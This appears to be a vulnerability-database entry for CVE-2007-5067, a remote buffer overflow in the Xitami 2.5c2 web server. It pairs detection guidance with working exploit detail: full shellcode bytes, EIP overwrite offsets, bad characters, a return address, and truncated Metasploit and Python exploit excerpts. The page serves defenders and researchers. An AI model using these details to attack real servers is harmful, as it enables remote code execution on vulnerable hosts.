CVE-2007-5067
published 2007-09-24CVE-2007-5067: Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1)…
PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
73.24%
99.4th percentile
Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1) xigui32.exe or (2) xitami.exe.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| imatix | xitami | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2
- →Detect HTTP requests with an 'If-Modified-Since' header value beginning with 'Evil, ' followed by a long string — this is the exact malicious header format used in the exploit. ↗
- →For xigui32.exe, EIP overwrite occurs at offset 76 bytes (72 bytes padding + 4-byte return address) in the If-Modified-Since header value. ↗
- →For xitami.exe, EIP overwrite occurs at offset 104 bytes in the If-Modified-Since header value. ↗
- →The Metasploit module uses the Egghunter technique and places the egg tag in the Host header; detect HTTP requests where the Host header contains egghunter shellcode bytes alongside an oversized If-Modified-Since header. ↗
- →Fingerprint the vulnerable server by checking for 'Xitami' in the HTTP banner response to GET / HTTP/1.1. ↗
- →Bad characters for payload delivery are null byte, newline, and carriage return (\x00\x0a\x0d); presence of these in the If-Modified-Since header would indicate a non-exploit or broken attempt. ↗
- ·The jmp esp ROP gadget address (0x7CA76981 in shell32.dll) is specific to Windows XP SP2 Polish; the Metasploit module uses universal return addresses within xigui32.exe and xitami.exe themselves, making it OS-locale-independent. ↗
- ·The Metasploit module targets Windows platforms only (w2ksp0, w2ksp4, xpsp0, xpsp2 en tested) and uses EXITFUNC=process. ↗
- ·Payload space is constrained to 700 bytes, which is why the Metasploit module employs the Egghunter technique rather than embedding shellcode directly in the overflow buffer. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)
exploitdb·2010-08-25
CVE-2007-5067 Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)
Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit)
---
##
# $Id: xitami_if_mod_since.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Xitami 2.5c2 Web Server If-Modified-Since Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the iMatix Corporation
Xitami Web Server. If a malicious user sends an If-Modified-Since
header containing an overly long string, it may be possible to
execute a payload remotely. Due to size constraints, this module uses
the Egghunter t
Exploit-DB
Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow
exploitdb·2007-09-24
CVE-2007-5067 Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow
Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow
---
#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]\r\n
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]\r\n
# EIP 41414141
#
# Product Homepage: http://www.xitami.com/
# Just for fun ;)
##
from struct import pack
from time import sleep
from socket import *
host = "192.168.0.1"
port = 80
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8
Metasploit
Xitami 2.5c2 Web Server If-Modified-Since Overflow
metasploit
Xitami 2.5c2 Web Server If-Modified-Since Overflow
Xitami 2.5c2 Web Server If-Modified-Since Overflow
This module exploits a stack buffer overflow in the iMatix Corporation Xitami Web Server. If a malicious user sends an If-Modified-Since header containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.
No writeups or analysis indexed.
http://secunia.com/advisories/26884http://www.securityfocus.com/bid/25772http://www.vupen.com/english/advisories/2007/3258https://exchange.xforce.ibmcloud.com/vulnerabilities/36756https://www.exploit-db.com/exploits/4450http://secunia.com/advisories/26884http://www.securityfocus.com/bid/25772http://www.vupen.com/english/advisories/2007/3258https://exchange.xforce.ibmcloud.com/vulnerabilities/36756https://www.exploit-db.com/exploits/4450
2007-09-24
Published